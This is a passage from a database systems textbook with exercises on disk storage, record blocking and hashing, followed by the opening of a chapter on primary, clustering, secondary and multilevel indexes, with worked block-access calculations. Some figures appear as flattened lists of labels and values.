particular disk unit): block size B = 512 bytes; interblock gap size G = 128 bytes; number of blocks per track = 20; number of tracks per surface = 400. A disk pack consists of 15 double-sided disks. a. What is the total capacity of a track, and what is its useful capacity (excluding interblock gaps)? b. How many cylinders are there? c. What are the total capacity and the useful capacity of a cylinder? d. What are the total capacity and the useful capacity of a disk pack? e. Suppose that the disk drive rotates the disk pack at a speed of 2400 rpm (revolutions per minute); what are the transfer rate (tr) in bytes/msec and the block transfer time (btt) in msec? What is the average rotational delay (rd) in msec? What is the bulk transfer rate? f. Suppose that the average seek time is 30 msec. How much time does it take (on the average) in msec to locate and transfer a single block, given its block address? 631 Disk Storage, Basic File Structures, and Hashing g. Calculate the average time it would take to transfer 20 random blocks, and compare this with the time it would take to transfer 20 consecutive blocks using double buffering to save seek time and rotational delay. 28. A file has r = 20,000 STUDENT records of fixed length. Each record has the following fields: Name (30 bytes), Ssn (9 bytes), Address (40 bytes), PHONE (10 bytes), Birth_date (8 bytes), Sex (1 byte), Major_dept_code (4 bytes), Minor_dept_code (4 bytes), Class_code (4 bytes, integer), and Degree_program (3 bytes). An additional byte is used as a deletion marker. The file is stored on the disk whose parameters are given in Exercise 27. a. Calculate the record size R in bytes. b. Calculate the blocking factor bfr and the number of file blocks b, assum- ing an unspanned organization. c. Calculate the average time it takes to find a record by doing a linear search on the file if (i) the file blocks are stored contiguously, and double buffer- ing is used; (ii) the file blocks are not stored contiguously. d. Assume that the file is ordered by Ssn; by doing a binary search, calculate the time it takes to search for a record given its Ssn value. 29. Suppose that only 80 percent of the STUDENT records from Exercise 28 have a value for Phone, 85 percent for Major_dept_code, 15 percent for Minor_dept_code, and 90 percent for Degree_program; and suppose that we use a variable-length record file. Each record has a 1-byte field type for each field in the record, plus the 1-byte deletion marker and a 1-byte end-of- record marker. Suppose that we use a spanned record organization, where each block has a 5-byte pointer to the next block (this space is not used for record storage). a. Calculate the average record length R in bytes. b. Calculate the number of blocks needed for the file. 30. Suppose that a disk unit has the following parameters: seek time s = 20 msec; rotational delay rd = 10 msec; block transfer time btt = 1 msec; block size B = 2400 bytes; interblock gap size G = 600 bytes. An EMPLOYEE file has the fol- lowing fields: Ssn, 9 bytes; Last_name, 20 bytes; First_name, 20 bytes; Middle_init, 1 byte; Birth_date, 10 bytes; Address, 35 bytes; Phone, 12 bytes; Supervisor_ssn, 9 bytes; Department, 4 bytes; Job_code, 4 bytes; deletion marker, 1 byte. The EMPLOYEE file has r = 30,000 records, fixed-length for- mat, and unspanned blocking. Write appropriate formulas and calculate the following values for the above EMPLOYEE file: a. The record size R (including the deletion marker), the blocking factor bfr, and the number of disk blocks b. b. Calculate the wasted space in each disk block because of the unspanned organization. c. Calculate the transfer rate tr and the bulk transfer rate btr for this disk unit (see Appendix B for definitions of tr and btr). 632 Disk Storage, Basic File Structures, and Hashing d. Calculate the average number of block accesses needed to search for an arbitrary record in the file, using linear search. e. Calculate in msec the average time needed to search for an arbitrary record in the file, using linear search, if the file blocks are stored on con- secutive disk blocks and double buffering is used. f. Calculate in msec the average time needed to search for an arbitrary record in the file, using linear search, if the file blocks are not stored on consecutive disk blocks. g. Assume that the records are ordered via some key field. Calculate the average number of block accesses and the average time needed to search for an arbitrary record in the file, using binary search. 31. A PARTS file with Part# as the hash key includes records with the following Part# values: 2369, 3760, 4692, 4871, 5659, 1821, 1074, 7115, 1620, 2428, 3943, 4750, 6975, 4981, and 9208. The file uses eight buckets, numbered 0 to 7. Each bucket is one disk block and holds two records. Load these records into the file in the given order, using the hash function h(K) = K mod 8. Calculate the average number of block accesses for a random retrieval on Part#. 32. Load the records of Exercise 31 into expandable hash files based on extendible hashing. Show the structure of the directory at each step, and the global and local depths. Use the hash function h(K) = K mod 128. 33. Load the records of Exercise 31 into an expandable hash file, using linear hashing. Start with a single disk block, using the hash function h0 = K mod 20, and show how the file grows and how the hash functions change as the records are inserted. Assume that blocks are split whenever an overflow occurs, and show the value of n at each stage. 34. Compare the file commands listed in Section 5 to those available on a file access method you are familiar with. 35. Suppose that we have an unordered file of fixed-length records that uses an unspanned record organization. Outline algorithms for insertion, deletion, and modification of a file record. State any assumptions you make. 36. Suppose that we have an ordered file of fixed-length records and an unordered overflow file to handle insertion. Both files use unspanned records. Outline algorithms for insertion, deletion, and modification of a file record and for reorganizing the file. State any assumptions you make. 37. Can you think of techniques other than an unordered overflow file that can be used to make insertions in an ordered file more efficient? 38. Suppose that we have a hash file of fixed-length records, and suppose that overflow is handled by chaining. Outline algorithms for insertion, deletion, and modification of a file record. State any assumptions you make. 633 Disk Storage, Basic File Structures, and Hashing 39. Can you think of techniques other than chaining to handle bucket overflow in external hashing? 40. Write pseudocode for the insertion algorithms for linear hashing and for extendible hashing. 41. Write program code to access individual fields of records under each of the following circumstances. For each case, state the assumptions you make con- cerning pointers, separator characters, and so on. Determine the type of information needed in the file header in order for your code to be general in each case. a. Fixed-length records with unspanned blocking b. Fixed-length records with spanned blocking c. Variable-length records with variable-length fields and spanned blocking d. Variable-length records with repeating groups and spanned blocking e. Variable-length records with optional fields and spanned blocking f. Variable-length records that allow all three cases in parts c, d, and e 42. Suppose that a file initially contains r = 120,000 records of R = 200 bytes each in an unsorted (heap) file. The block size B = 2400 bytes, the average seek time s = 16 ms, the average rotational latency rd = 8.3 ms, and the block transfer time btt = 0.8 ms. Assume that 1 record is deleted for every 2 records added until the total number of active records is 240,000. a. How many block transfers are needed to reorganize the file? b. How long does it take to find a record right before reorganization? c. How long does it take to find a record right after reorganization? 43. Suppose we have a sequential (ordered) file of 100,000 records where each record is 240 bytes. Assume that B = 2400 bytes, s = 16 ms, rd = 8.3 ms, and btt = 0.8 ms. Suppose we want to make X independent random record reads from the file. We could make X random block reads or we could perform one exhaustive read of the entire file looking for those X records. The question is to decide when it would be more efficient to perform one exhaustive read of the entire file than to perform X individual random reads. That is, what is the value for X when an exhaustive read of the file is more efficient than ran- dom X reads? Develop this as a function of X. 44. Suppose that a static hash file initially has 600 buckets in the primary area and that records are inserted that create an overflow area of 600 buckets. If we reorganize the hash file, we can assume that most of the overflow is elim- inated. If the cost of reorganizing the file is the cost of the bucket transfers (reading and writing all of the buckets) and the only periodic file operation is the fetch operation, then how many times would we have to perform a fetch (successfully) to make the reorganization cost effective? That is, the reorganization cost and subsequent search cost are less than the search cost before reorganization. Support your answer. Assume s = 16 ms, rd = 8.3 ms, and btt = 1 ms. 634 Disk Storage, Basic File Structures, and Hashing 45. Suppose we want to create a linear hash file with a file load factor of 0.7 and a blocking factor of 20 records per bucket, which is to contain 112,000 records initially. a. How many buckets should we allocate in the primary area? b. What should be the number of bits used for bucket addresses? Selected Bibliography Wiederhold (1987) has a detailed discussion and analysis of secondary storage devices and file organizations as a part of database design. Optical disks are described in Berg and Roth (1989) and analyzed in Ford and Christodoulakis (1991). Flash memory is discussed by Dipert and Levy (1993). Ruemmler and Wilkes (1994) present a survey of the magnetic-disk technology. Most textbooks on databases include discussions of the material presented here. Most data structures textbooks, including Knuth (1998), discuss static hashing in more detail; Knuth has a complete discussion of hash functions and collision resolution techniques, as well as of their performance comparison. Knuth also offers a detailed discussion of tech- niques for sorting external files. Textbooks on file structures include Claybrook (1992), Smith and Barnes (1987), and Salzberg (1988); they discuss additional file organizations including tree-structured files, and have detailed algorithms for oper- ations on files. Salzberg et al. (1990) describe a distributed external sorting algo- rithm. File organizations with a high degree of fault tolerance are described by Bitton and Gray (1988) and by Gray et al. (1990). Disk striping was proposed in Salem and Garcia Molina (1986). The first paper on redundant arrays of inexpen- sive disks (RAID) is by Patterson et al. (1988). Chen and Patterson (1990) and the excellent survey of RAID by Chen et al. (1994) are additional references. Grochowski and Hoyt (1996) discuss future trends in disk drives. Various formulas for the RAID architecture appear in Chen et al. (1994). Morris (1968) is an early paper on hashing. Extendible hashing is described in Fagin et al. (1979). Linear hashing is described by Litwin (1980). Algorithms for insertion and deletion for linear hashing are discussed with illustrations in Salzberg (1988). Dynamic hashing, which we briefly introduced, was proposed by Larson (1978). There are many proposed variations for extendible and linear hashing; for exam- ples, see Cesarini and Soda (1991), Du and Tong (1991), and Hachem and Berra (1992). Details of disk storage devices can be found at manufacturer sites (for example, http://www.seagate.com, http://www.ibm.com, http://www.emc.com, http://www .hp.com, http://www.storagetek.com,. IBM has a storage technology research center at IBM Almaden (http://www.almaden.ibm.com/). 635 Indexing Structures for Files In this chapter we assume that a file already exists withsome primary organization such as the unordered, ordered, or hashed organizations. We will describe additional auxiliary access structures called indexes, which are used to speed up the retrieval of records in response to certain search conditions. The index structures are additional files on disk that provide secondary access paths, which provide alternative ways to access the records without affecting the physical placement of records in the primary data file on disk. They enable efficient access to records based on the indexing fields that are used to construct the index. Basically, any field of the file can be used to create an index, and multiple indexes on different fields—as well as indexes on multiple fields—can be constructed on the same file. A variety of indexes are possible; each of them uses a particular data structure to speed up the search. To find a record or records in the data file based on a search condition on an indexing field, the index is searched, which leads to pointers to one or more disk blocks in the data file where the required records are located. The most prevalent types of indexes are based on ordered files (single-level indexes) and tree data structures (multilevel indexes, B+- trees). Indexes can also be constructed based on hashing or other search data struc- tures. We also discuss indexes that are vectors of bits called bitmap indexes. We describe different types of single-level ordered indexes—primary, secondary, and clustering—in Section 1. By viewing a single-level index as an ordered file, one can develop additional indexes for it, giving rise to the concept of multilevel indexes. A popular indexing scheme called ISAM (Indexed Sequential Access Method) is based on this idea. We discuss multilevel tree-structured indexes in Section 2. In Section 3 we describe B-trees and B+-trees, which are data structures that are commonly used in DBMSs to implement dynamically changing multi- level indexes. B+-trees have become a commonly accepted default structure for From Chapter 18 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 636 Indexing Structures for Files generating indexes on demand in most relational DBMSs. Section 4 is devoted to alternative ways to access data based on a combination of multiple keys. In Section 5 we discuss hash indexes and introduce the concept of logical indexes, which give an additional level of indirection from physical indexes, allowing for the physical index to be flexible and extensible in its organization. In Section 6 we discuss multikey indexing and bitmap indexes used for searching on one or more keys. Section 7 summarizes the chapter. 1 Types of Single-Level Ordered Indexes The idea behind an ordered index is similar to that behind the index used in a text- book, which lists important terms at the end of the book in alphabetical order along with a list of page numbers where the term appears in the book. We can search the book index for a certain term in the textbook to find a list of addresses—page num- bers in this case—and use these addresses to locate the specified pages first and then search for the term on each specified page. The alternative, if no other guidance is given, would be to sift slowly through the whole textbook word by word to find the term we are interested in; this corresponds to doing a linear search, which scans the whole file. Of course, most books do have additional information, such as chapter and section titles, which help us find a term without having to search through the whole book. However, the index is the only exact indication of the pages where each term occurs in the book. For a file with a given record structure consisting of several fields (or attributes), an index access structure is usually defined on a single field of a file, called an indexing field (or indexing attribute).1 The index typically stores each value of the index field along with a list of pointers to all disk blocks that contain records with that field value. The values in the index are ordered so that we can do a binary search on the index. If both the data file and the index file are ordered, and since the index file is typically much smaller than the data file, searching the index using a binary search is a better option. Tree-structured multilevel indexes (see Section 2) imple- ment an extension of the binary search idea that reduces the search space by 2-way partitioning at each search step, thereby creating a more efficient approach that divides the search space in the file n-ways at each stage. There are several types of ordered indexes. A primary index is specified on the ordering key field of an ordered file of records. Recall that an ordering key field is used to physically order the file records on disk, and every record has a unique value for that field. If the ordering field is not a key field—that is, if numerous records in the file can have the same value for the ordering field—another type of index, called a clustering index, can be used. The data file is called a clustered file in this latter case. Notice that a file can have at most one physical ordering field, so it can have at most one primary index or one clustering index, but not both. A third type of index, called a secondary index, can be specified on any nonordering field of a file. A data 1We use the terms field and attribute interchangeably in this chapter. 637 Indexing Structures for Files file can have several secondary indexes in addition to its primary access method. We discuss these types of single-level indexes in the next three subsections. 1.1 Primary Indexes A primary index is an ordered file whose records are of fixed length with two fields, and it acts like an access structure to efficiently search for and access the data records in a data file. The first field is of the same data type as the ordering key field—called the primary key—of the data file, and the second field is a pointer to a disk block (a block address). There is one index entry (or index record) in the index file for each block in the data file. Each index entry has the value of the pri- mary key field for the first record in a block and a pointer to that block as its two field values. We will refer to the two field values of index entry i as .

To create a primary index on the ordered file shown in Figure A.1 (at the end of this
chapter, in Appendix: Figures and Table), we use the Name field as primary key,
because that is the ordering key field of the file (assuming that each value of Name is
unique). Each entry in the index has a Name value and a pointer. The first three
index entries are as follows:

Figure 1 illustrates this primary index. The total number of entries in the index is
the same as the number of disk blocks in the ordered data file. The first record in each
block of the data file is called the anchor record of the block, or simply the block
anchor.2

Indexes can also be characterized as dense or sparse. A dense index has an index
entry for every search key value (and hence every record) in the data file. A sparse
(or nondense) index, on the other hand, has index entries for only some of the
search values. A sparse index has fewer entries than the number of records in the
file. Thus, a primary index is a nondense (sparse) index, since it includes an entry
for each disk block of the data file and the keys of its anchor record rather than for
every search value (or every record).

The index file for a primary index occupies a much smaller space than does the data
file, for two reasons. First, there are fewer index entries than there are records in the
data file. Second, each index entry is typically smaller in size than a data record
because it has only two fields; consequently, more index entries than data records
can fit in one block. Therefore, a binary search on the index file requires fewer block
accesses than a binary search on the data file. Referring to Table A.1, note that the
binary search for an ordered data file required log2b block accesses. But if the pri-
mary index file contains only bi blocks, then to locate a record with a search key

2We can use a scheme similar to the one described here, with the last record in each block (rather than
the first) as the block anchor. This slightly improves the efficiency of the search algorithm.

638

Indexing Structures for Files

Index file
( entries)

Block anchor
primary key

value
Block

pointer

(Primary
key field)

Name

Aaron, Ed
Abbot, Diane

Acosta, Marc

Adams, John

Adams, Robin

Akers, Jan

Alexander, Ed

Alfred, Bob

Allen, Sam

Allen, Troy

Anders, Keith

Anderson, Rob

Anderson, Zach

Angel, Joe

Archer, Sue

Arnold, Mack

Arnold, Steven

Atkins, Timothy

Wong, James

Wood, Donald

Woods, Manny

Wright, Pam

Wyatt, Charles

Zimmer, Byron

Aaron, Ed

Adams, John

Alexander, Ed

Allen, Troy

Anderson, Zach

Arnold, Mack

Wong, James

Wright, Pam

. .
.

. .
.

Ssn Birth_date Job Salary Sex

Figure 1
Primary index on the ordering key field of
the file shown in Figure A.1.

639

Indexing Structures for Files

value requires a binary search of that index and access to the block containing that
record: a total of log2bi + 1 accesses.

A record whose primary key value is K lies in the block whose address is P(i), where
K(i) ≤ K < K(i + 1). The ith block in the data file contains all such records because of the physical ordering of the file records on the primary key field. To retrieve a record, given the value K of its primary key field, we do a binary search on the index file to find the appropriate index entry i, and then retrieve the data file block whose address is P(i).3 Example 1 illustrates the saving in block accesses that is attainable when a primary index is used to search for a record. Example 1. Suppose that we have an ordered file with r = 30,000 records stored on a disk with block size B = 1024 bytes. File records are of fixed size and are unspanned, with record length R = 100 bytes. The blocking factor for the file would be bfr = ⎣(B/R)⎦ = ⎣(1024/100)⎦ = 10 records per block. The number of blocks needed for the file is b = ⎡(r/bfr)⎤ = ⎡(30000/10)⎤ = 3000 blocks. A binary search on the data file would need approximately ⎡log2b⎤= ⎡(log23000)⎤ = 12 block accesses. Now suppose that the ordering key field of the file is V = 9 bytes long, a block pointer is P = 6 bytes long, and we have constructed a primary index for the file. The size of each index entry is Ri = (9 + 6) = 15 bytes, so the blocking factor for the index is bfri = ⎣(B/Ri)⎦ = ⎣(1024/15)⎦ = 68 entries per block. The total number of index entries ri is equal to the number of blocks in the data file, which is 3000. The num- ber of index blocks is hence bi = ⎡(ri/bfri)⎤ = ⎡(3000/68)⎤ = 45 blocks. To perform a binary search on the index file would need ⎡(log2bi)⎤ = ⎡(log245)⎤ = 6 block accesses. To search for a record using the index, we need one additional block access to the data file for a total of 6 + 1 = 7 block accesses—an improvement over binary search on the data file, which required 12 disk block accesses. A major problem with a primary index—as with any ordered file—is insertion and deletion of records. With a primary index, the problem is compounded because if we attempt to insert a record in its correct position in the data file, we must not only move records to make space for the new record but also change some index entries, since moving records will change the anchor records of some blocks. Using an unordered overflow file can reduce this problem. Another possibility is to use a linked list of overflow records for each block in the data file. This is similar to the method of dealing with overflow records related to hashing. Records within each block and its overflow linked list can be sorted to improve retrieval time. Record deletion is handled using deletion markers. 1.2 Clustering Indexes If file records are physically ordered on a nonkey field—which does not have a dis- tinct value for each record—that field is called the clustering field and the data file 3Notice that the above formula would not be correct if the data file were ordered on a nonkey field; in that case the same index value in the block anchor could be repeated in the last records of the previous block. 640 is called a clustered file. We can create a different type of index, called a clustering index, to speed up retrieval of all the records that have the same value for the clus- tering field. This differs from a primary index, which requires that the ordering field of the data file have a distinct value for each record. A clustering index is also an ordered file with two fields; the first field is of the same type as the clustering field of the data file, and the second field is a disk block pointer. There is one entry in the clustering index for each distinct value of the clus- tering field, and it contains the value and a pointer to the first block in the data file that has a record with that value for its clustering field. Figure 2 shows an example. Notice that record insertion and deletion still cause problems because the data records are physically ordered. To alleviate the problem of insertion, it is common to reserve a whole block (or a cluster of contiguous blocks) for each value of the clus- tering field; all records with that value are placed in the block (or block cluster). This makes insertion and deletion relatively straightforward. Figure 3 shows this scheme. A clustering index is another example of a nondense index because it has an entry for every distinct value of the indexing field, which is a nonkey by definition and hence has duplicate values rather than a unique value for every record in the file. There is some similarity between Figures 1, 2, and 3 and Figures A.2 and A.3. An index is somewhat similar to dynamic hashing and to the directory structures used for extendible hashing. Both are searched to find a pointer to the data block con- taining the desired record. A main difference is that an index search uses the values of the search field itself, whereas a hash directory search uses the binary hash value that is calculated by applying the hash function to the search field. 1.3 Secondary Indexes A secondary index provides a secondary means of accessing a data file for which some primary access already exists. The data file records could be ordered, unordered, or hashed. The secondary index may be created on a field that is a can- didate key and has a unique value in every record, or on a nonkey field with dupli- cate values. The index is again an ordered file with two fields. The first field is of the same data type as some nonordering field of the data file that is an indexing field. The second field is either a block pointer or a record pointer. Many secondary indexes (and hence, indexing fields) can be created for the same file—each repre- sents an additional means of accessing that file based on some specific field. First we consider a secondary index access structure on a key (unique) field that has a distinct value for every record. Such a field is sometimes called a secondary key; in the relational model, this would correspond to any UNIQUE key attribute or to the primary key attribute of a table. In this case there is one index entry for each record in the data file, which contains the value of the field for the record and a pointer either to the block in which the record is stored or to the record itself. Hence, such an index is dense. Indexing Structures for Files 641 Data file (Clustering field) Dept_number 1 1 1 2 Name Ssn Birth_date SalaryJob 2 3 3 3 3 3 4 4 5 5 5 5 6 6 6 6 6 8 8 8 1 2 3 4 5 6 8 Index file ( entries)

Clustering
field value

Block
pointer

Figure 2
A clustering index on the Dept_number ordering
nonkey field of an EMPLOYEE file.

Indexing Structures for Files

Again we refer to the two field values of index entry i as . The entries are
ordered by value of K(i), so we can perform a binary search. Because the records of
the data file are not physically ordered by values of the secondary key field, we cannot
use block anchors. That is why an index entry is created for each record in the data

642

Indexing Structures for Files

Data file

Block pointer
NULL pointer

(Clustering
field)

Dept_number
1

1
2
3
4
5
6
8

1
1

Name Ssn Birth_date SalaryJob

Block pointer

2
2

Block pointer

3

3
3
3

Block pointer

3

Block pointer

4
4

Block pointer

5
5
5
5

Block pointer

6
6
6
6

Block pointer

6

Block pointer

8

8
8

NULL pointer

NULL pointer

NULL pointer

NULL pointer

NULL pointer

NULL pointer

Index file
( entries)

Clustering
field value

Block
pointer

Figure 3
Clustering index with a
separate block cluster for
each group of records
that share the same value
for the clustering field.

643

Indexing Structures for Files

Data file

Indexing field
(secondary
key field)

6
15

3

17

9
5

13
8

21

11

16
2

24

10

20
1

4

23

18
14

12

7

19
22

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15
16

17

18

19

20

21

22
23

24

Index file
( entries)

Index
field value

Block
pointer

Figure 4
A dense secondary index (with block pointers) on a nonordering key field of a file.

file, rather than for each block, as in the case of a primary index. Figure 4 illustrates a
secondary index in which the pointers P(i) in the index entries are block pointers, not
record pointers. Once the appropriate disk block is transferred to a main memory
buffer, a search for the desired record within the block can be carried out.

644

Indexing Structures for Files

A secondary index usually needs more storage space and longer search time than
does a primary index, because of its larger number of entries. However, the
improvement in search time for an arbitrary record is much greater for a secondary
index than for a primary index, since we would have to do a linear search on the data
file if the secondary index did not exist. For a primary index, we could still use a
binary search on the main file, even if the index did not exist. Example 2 illustrates
the improvement in number of blocks accessed.

Example 2. Consider the file of Example 1 with r = 30,000 fixed-length records of
size R = 100 bytes stored on a disk with block size B = 1024 bytes. The file has b =
3000 blocks, as calculated in Example 1. Suppose we want to search for a record with
a specific value for the secondary key—a nonordering key field of the file that is V =
9 bytes long. Without the secondary index, to do a linear search on the file would
require b/2 = 3000/2 = 1500 block accesses on the average. Suppose that we con-
struct a secondary index on that nonordering key field of the file. As in Example 1, a
block pointer is P = 6 bytes long, so each index entry is Ri = (9 + 6) = 15 bytes, and
the blocking factor for the index is bfri = ⎣(B/Ri)⎦ = ⎣(1024/15)⎦ = 68 entries per
block. In a dense secondary index such as this, the total number of index entries ri is
equal to the number of records in the data file, which is 30,000. The number of blocks
needed for the index is hence bi = ⎡(ri /bfri)⎤ = ⎡(3000/68)⎤ = 442 blocks.

A binary search on this secondary index needs ⎡(log2bi)⎤ = ⎡(log2442)⎤ = 9 block
accesses. To search for a record using the index, we need an additional block access
to the data file for a total of 9 + 1 = 10 block accesses—a vast improvement over the
1500 block accesses needed on the average for a linear search, but slightly worse than
the 7 block accesses required for the primary index. This difference arose because
the primary index was nondense and hence shorter, with only 45 blocks in length.

We can also create a secondary index on a nonkey, nonordering field of a file. In this
case, numerous records in the data file can have the same value for the indexing
field. There are several options for implementing such an index:

■ Option 1 is to include duplicate index entries with the same K(i) value—one
for each record. This would be a dense index.

■ Option 2 is to have variable-length records for the index entries, with a
repeating field for the pointer. We keep a list of pointers
in the index entry for K(i)—one pointer to each block that contains a record
whose indexing field value equals K(i). In either option 1 or option 2, the
binary search algorithm on the index must be modified appropriately to
account for a variable number of index entries per index key value.

■ Option 3, which is more commonly used, is to keep the index entries them-
selves at a fixed length and have a single entry for each index field value, but
to create an extra level of indirection to handle the multiple pointers. In this
nondense scheme, the pointer P(i) in index entry points to a
disk block, which contains a set of record pointers; each record pointer in that
disk block points to one of the data file records with value K(i) for the index-
ing field. If some value K(i) occurs in too many records, so that their record
pointers cannot fit in a single disk block, a cluster or linked list of blocks is

645

Indexing Structures for Files

Data file

(Indexing field)

Dept_number

3

5

1
6

Name Ssn Birth_date SalaryJob

2

3

4

8

6
8

4

1

6

5

2

5

5

1

6

3

6

3

8

3

1

2

3

4

5

6
8

Blocks of
record

pointers

Index file

( entries)

Field
value

Block
pointer

Figure 5
A secondary index (with
record pointers) on a non-
key field implemented
using one level of indirec-
tion so that index entries
are of fixed length and
have unique field values.

used. This technique is illustrated in Figure 5. Retrieval via the index requires
one or more additional block accesses because of the extra level, but the
algorithms for searching the index and (more importantly) for inserting of
new records in the data file are straightforward. In addition, retrievals on
complex selection conditions may be handled by referring to the record
pointers, without having to retrieve many unnecessary records from the data
file (see Exercise 23).

646

Notice that a secondary index provides a logical ordering on the records by the
indexing field. If we access the records in order of the entries in the secondary index,
we get them in order of the indexing field. The primary and clustering indexes
assume that the field used for physical ordering of records in the file is the same as
the indexing field.

1.4 Summary
To conclude this section, we summarize the discussion of index types in two tables.
Table 1 shows the index field characteristics of each type of ordered single-level
index discussed—primary, clustering, and secondary. Table 2 summarizes the prop-
erties of each type of index by comparing the number of index entries and specify-
ing which indexes are dense and which use block anchors of the data file.

Indexing Structures for Files

Table 1 Types of Indexes Based on the Properties of the Indexing Field

Index Field Used
for Physical Ordering
of the File

Index Field Not Used
for Physical Ordering
of the File

Indexing field is key Primary index Secondary index (Key)

Indexing field is nonkey Clustering index Secondary index (NonKey)

Table 2 Properties of Index Types

Type of Index
Number of (First-level)
Index Entries

Dense or Nondense
(Sparse)

Block Anchoring
on the Data File

Primary Number of blocks in
data file

Nondense Yes

Clustering Number of distinct
index field values

Nondense Yes/noa

Secondary (key) Number of records in
data file

Dense No

Secondary (nonkey) Number of recordsb or
number of distinct index
field valuesc

Dense or Nondense No

aYes if every distinct value of the ordering field starts a new block; no otherwise.
bFor option 1.
cFor options 2 and 3.

647

Indexing Structures for Files

2 Multilevel Indexes
The indexing schemes we have described thus far involve an ordered index file. A
binary search is applied to the index to locate pointers to a disk block or to a record
(or records) in the file having a specific index field value. A binary search requires
approximately (log2bi) block accesses for an index with bi blocks because each step
of the algorithm reduces the part of the index file that we continue to search by a
factor of 2. This is why we take the log function to the base 2. The idea behind a
multilevel index is to reduce the part of the index that we continue to search by bfri,
the blocking factor for the index, which is larger than 2. Hence, the search space is
reduced much faster. The value bfri is called the fan-out of the multilevel index, and
we will refer to it by the symbol fo. Whereas we divide the record search space into
two halves at each step during a binary search, we divide it n-ways (where n = the
fan-out) at each search step using the multilevel index. Searching a multilevel index
requires approximately (logfobi) block accesses, which is a substantially smaller
number than for a binary search if the fan-out is larger than 2. In most cases, the
fan-out is much larger than 2.

A multilevel index considers the index file, which we will now refer to as the first (or
base) level of a multilevel index, as an ordered file with a distinct value for each K(i).
Therefore, by considering the first-level index file as a sorted data file, we can create
a primary index for the first level; this index to the first level is called the second
level of the multilevel index. Because the second level is a primary index, we can use
block anchors so that the second level has one entry for each block of the first level.
The blocking factor bfri for the second level—and for all subsequent levels—is the
same as that for the first-level index because all index entries are the same size; each
has one field value and one block address. If the first level has r1 entries, and the
blocking factor—which is also the fan-out—for the index is bfri = fo, then the first
level needs ⎡(r1/fo)⎤ blocks, which is therefore the number of entries r2 needed at the
second level of the index.

We can repeat this process for the second level. The third level, which is a primary
index for the second level, has an entry for each second-level block, so the number
of third-level entries is r3 = ⎡(r2/fo)⎤. Notice that we require a second level only if the
first level needs more than one block of disk storage, and, similarly, we require a
third level only if the second level needs more than one block. We can repeat the
preceding process until all the entries of some index level t fit in a single block. This
block at the tth level is called the top index level.4 Each level reduces the number of
entries at the previous level by a factor of fo—the index fan-out—so we can use the
formula 1 ≤ (r1/((fo)

t)) to calculate t. Hence, a multilevel index with r1 first-level
entries will have approximately t levels, where t = ⎡(logfo(r1))⎤. When searching the

4The numbering scheme for index levels used here is the reverse of the way levels are commonly
defined for tree data structures. In tree data structures, t is referred to as level 0 (zero), t – 1 is level 1,
and so on.

648

Indexing Structures for Files

index, a single disk block is retrieved at each level. Hence, t disk blocks are accessed
for an index search, where t is the number of index levels.

The multilevel scheme described here can be used on any type of index—whether it
is primary, clustering, or secondary—as long as the first-level index has distinct val-
ues for K(i) and fixed-length entries. Figure 6 shows a multilevel index built over a
primary index. Example 3 illustrates the improvement in number of blocks accessed
when a multilevel index is used to search for a record.

Example 3. Suppose that the dense secondary index of Example 2 is converted into
a multilevel index. We calculated the index blocking factor bfri = 68 index entries
per block, which is also the fan-out fo for the multilevel index; the number of first-
level blocks b1 = 442 blocks was also calculated. The number of second-level blocks
will be b2 = ⎡(b1/fo)⎤ = ⎡(442/68)⎤ = 7 blocks, and the number of third-level blocks
will be b3 = ⎡(b2/fo)⎤ = ⎡(7/68)⎤ = 1 block. Hence, the third level is the top level of
the index, and t = 3. To access a record by searching the multilevel index, we must
access one block at each level plus one block from the data file, so we need t + 1 = 3
+ 1 = 4 block accesses. Compare this to Example 2, where 10 block accesses were
needed when a single-level index and binary search were used.

Notice that we could also have a multilevel primary index, which would be non-
dense. Exercise 18(c) illustrates this case, where we must access the data block from
the file before we can determine whether the record being searched for is in the file.
For a dense index, this can be determined by accessing the first index level (without
having to access a data block), since there is an index entry for every record in the
file.

A common file organization used in business data processing is an ordered file with
a multilevel primary index on its ordering key field. Such an organization is called
an indexed sequential file and was used in a large number of early IBM systems.
IBM’s ISAM organization incorporates a two-level index that is closely related to
the organization of the disk in terms of cylinders and tracks. The first level is a cylin-
der index, which has the key value of an anchor record for each cylinder of a disk
pack occupied by the file and a pointer to the track index for the cylinder. The track
index has the key value of an anchor record for each track in the cylinder and a
pointer to the track. The track can then be searched sequentially for the desired
record or block. Insertion is handled by some form of overflow file that is merged
periodically with the data file. The index is recreated during file reorganization.

Algorithm 1 outlines the search procedure for a record in a data file that uses a non-
dense multilevel primary index with t levels. We refer to entry i at level j of the index
as , and we search for a record whose primary key value is K. We
assume that any overflow records are ignored. If the record is in the file, there must
be some entry at level 1 with K1(i) ≤ K < K1(i + 1) and the record will be in the block of the data file whose address is P1(i). Exercise 23 discusses modifying the search algorithm for other types of indexes. 649 Indexing Structures for Files Data file Primary key field Second (top) level Two-level index 2 5 8 12 15 21 24 29 35 36 39 41 44 46 51 52 55 58 63 66 71 78 80 82 85 89 2 35 55 85 First (base) level 2 8 15 24 35 39 44 51 55 63 71 80 85 Figure 6 A two-level primary index resembling ISAM (Indexed Sequential Access Method) organization. 650 Indexing Structures for Files Algorithm 1. Searching a Nondense Multilevel Primary Index with t Levels (* We assume the index entry to be a block anchor that is the first key per block. *) p ← address of top-level block of index; for j ← t step – 1 to 1 do begin read the index block (at jth index level) whose address is p; search block p for entry i such that Kj (i) ≤ K < Kj(i + 1) (* if Kj(i) is the last entry in the block, it is sufficient to satisfy Kj(i) ≤ K *); p ← Pj(i ) (* picks appropriate pointer at jth index level *) end; read the data file block whose address is p; search block p for record with key = K; As we have seen, a multilevel index reduces the number of blocks accessed when searching for a record, given its indexing field value. We are still faced with the prob- lems of dealing with index insertions and deletions, because all index levels are physically ordered files. To retain the benefits of using multilevel indexing while reducing index insertion and deletion problems, designers adopted a multilevel index called a dynamic multilevel index that leaves some space in each of its blocks for inserting new entries and uses appropriate insertion/deletion algorithms for cre- ating and deleting new index blocks when the data file grows and shrinks. It is often implemented by using data structures called B-trees and B+-trees, which we describe in the next section. 3 Dynamic Multilevel Indexes Using B-Trees and B+-Trees B-trees and B+-trees are special cases of the well-known search data structure known as a tree. We briefly introduce the terminology used in discussing tree data structures. A tree is formed of nodes. Each node in the tree, except for a special node called the root, has one parent node and zero or more child nodes. The root node has no parent. A node that does not have any child nodes is called a leaf node; a nonleaf node is called an internal node. The level of a node is always one more than the level of its parent, with the level of the root node being zero.5 A subtree of a node consists of that node and all its descendant 